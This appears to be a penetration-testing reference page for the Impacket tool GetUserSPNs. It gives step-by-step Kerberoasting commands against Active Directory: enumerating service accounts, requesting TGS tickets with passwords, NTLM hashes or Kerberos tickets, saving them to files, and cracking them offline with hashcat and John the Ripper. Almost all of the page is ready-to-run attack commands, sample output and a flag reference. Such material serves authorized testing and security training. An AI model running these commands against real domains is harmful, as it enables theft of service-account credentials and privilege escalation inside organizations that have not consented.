impacket-GetUserSPNs

Overview

impacket-GetUserSPNs performs Kerberoasting by enumerating user accounts with Service Principal Names (SPNs) and requesting their TGS tickets. These tickets are encrypted with the service account’s password hash and can be cracked offline.

impacket-GetUserSPNs <DOMAIN>/<USER>:<PASSWORD> -dc-ip <DC_IP> [options]

Authentication

With Password

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

With NTLM Hash

impacket-GetUserSPNs domain.local/jdoe -hashes :a1b2c3d4e5f6a1b2c3d4e5f6a1b2c3d4 -dc-ip 10.10.10.1

With Kerberos

export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetUserSPNs domain.local/jdoe -k -no-pass -dc-host dc01.domain.local

When using -k, provide -dc-host with the FQDN instead of -dc-ip.

Enumerate SPN Accounts

List all user accounts that have SPNs set (without requesting tickets):

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1

Output shows the SPN, account name, password last set date, and delegation status:

ServicePrincipalName    Name       MemberOf                              PasswordLastSet
----------------------  ---------  ------------------------------------  -------------------
mssql/sql01.domain.local  svc_sql   CN=Domain Admins,CN=Users,DC=domain   2024-01-15 10:23:45
http/web01.domain.local   svc_web   CN=Service Accounts,OU=Groups,DC=dom  2023-08-20 14:12:33

Request TGS Tickets

Request All

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request

Request for Specific User

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request-user svc_sql

Output Format for Cracking

Save to File

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request -outputfile kerberoast.txt

Request Specific User and Save

impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request-user svc_sql -outputfile svc_sql.txt

The output format is ready for hashcat by default ($krb5tgs$23$*...).

Cracking with Hashcat and John

Hashcat

RC4 (most common):

hashcat -m 13100 kerberoast.txt /usr/share/wordlists/rockyou.txt

AES256 (etype 17/18):

hashcat -m 19700 kerberoast.txt /usr/share/wordlists/rockyou.txt

Hash Mode	Encryption Type
`13100`	Kerberos 5 TGS-REP etype 23 (RC4)
`19600`	Kerberos 5 TGS-REP etype 17 (AES128)
`19700`	Kerberos 5 TGS-REP etype 18 (AES256)

John the Ripper

john kerberoast.txt --wordlist=/usr/share/wordlists/rockyou.txt

Kerberos Authentication

Use an existing TGT to Kerberoast without sending NTLM traffic:

# Get a TGT first
impacket-getTGT domain.local/jdoe:'Password123' -dc-ip 10.10.10.1
export KRB5CCNAME=$(pwd)/jdoe.ccache

# Kerberoast using Kerberos auth
impacket-GetUserSPNs domain.local/jdoe -k -no-pass -dc-host dc01.domain.local -request -outputfile kerberoast.txt

No Preauth Enumeration

If you find accounts with Kerberos pre-authentication disabled, you can request their AS-REP hashes without credentials. For that specific attack, use impacket-GetNPUsers instead. However, GetUserSPNs can be combined with accounts that have SPNs but no preauth:

# First enumerate with GetUserSPNs, then target specific accounts
impacket-GetUserSPNs domain.local/jdoe:'Password123' -dc-ip 10.10.10.1 -request

Quick Reference

# Enumerate SPN accounts
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1

# Request all TGS tickets
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1 -request

# Request specific user
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1 -request-user svc_sql

# Save to file
impacket-GetUserSPNs domain.local/jdoe:'Pass' -dc-ip 10.10.10.1 -request -outputfile hashes.txt

# With hash
impacket-GetUserSPNs domain.local/jdoe -hashes :NTHASH -dc-ip 10.10.10.1 -request

# With Kerberos
export KRB5CCNAME=$(pwd)/jdoe.ccache
impacket-GetUserSPNs domain.local/jdoe -k -no-pass -dc-host dc01.domain.local -request

# Crack with hashcat (RC4)
hashcat -m 13100 hashes.txt rockyou.txt

# Crack with hashcat (AES256)
hashcat -m 19700 hashes.txt rockyou.txt

Flag	Description
`-request`	Request TGS tickets for all SPN accounts
`-request-user USER`	Request TGS for a specific user
`-outputfile FILE`	Save tickets to file
`-hashes LMHASH:NTHASH`	Authenticate with NTLM hash
`-aesKey KEY`	Authenticate with AES key
`-dc-ip IP`	Domain controller IP address
`-dc-host HOST`	Domain controller hostname (for Kerberos auth)
`-k`	Use Kerberos authentication
`-no-pass`	Don’t ask for password
`-usersfile FILE`	File with target usernames (one per line)

​Overview

​Authentication

​With Password

​With NTLM Hash

​With Kerberos

​Enumerate SPN Accounts

​Request TGS Tickets

​Request All

​Request for Specific User

​Output Format for Cracking

​Save to File

​Request Specific User and Save

​Cracking with Hashcat and John

​Hashcat

​John the Ripper

​Kerberos Authentication

​No Preauth Enumeration

​Quick Reference